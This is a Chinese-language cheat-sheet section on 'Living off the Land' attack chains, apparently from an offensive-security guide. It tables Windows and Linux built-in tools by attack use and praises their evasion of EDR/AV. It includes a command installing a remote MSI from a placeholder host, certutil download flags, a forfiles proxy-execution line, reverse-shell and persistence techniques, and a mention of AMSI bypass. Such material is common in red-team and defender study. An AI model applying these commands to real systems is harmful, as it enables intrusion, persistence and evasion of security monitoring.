Skip to content

23. Living off the Land (LotL) 攻击链

利用目标系统自带工具完成攻击,无需投放额外二进制文件,极大规避EDR/AV检测。

23.1 Windows LotL工具链

工具 用途
PowerShell 下载执行/信息收集/凭证操作(已过时?用C# AMSI Bypass替代)
WMI 远程命令执行/信息收集/持久化
certutil 远程下载(certutil -urlcache -split -f)
mshta 执行HTA/JavaScript
msiexec 安装远程MSI(msiexec /q /i http://xxx/evil.msi)
msbuild 执行内联C#(msbuild.exe xxx.csproj)
csc.exe 本地编译C#(不依赖Visual Studio)
rundll32 加载DLL/执行JavaScript
forfiles 代理执行(forfiles /p c:\ /m notepad.exe /c "cmd /c evil")
psexec 远程执行(Sysinternals)
schtasks 计划任务持久化
reg 注册表操作/持久化
wmic 远程WMI命令执行
bitsadmin 后台下载
installutil .NET应用安装→执行代码

23.2 Linux LotL工具链

工具 用途
curl/wget 下载payload
bash -i 反弹shell
python/perl/ruby 一行执行器
awk 命令执行(awk 'BEGIN{system("id")}')
find 命令执行(find / -exec cmd \;)
xxd/base64 编解码
ssh -R/-L 隧道/端口转发
crontab 持久化
systemctl 服务创建/持久化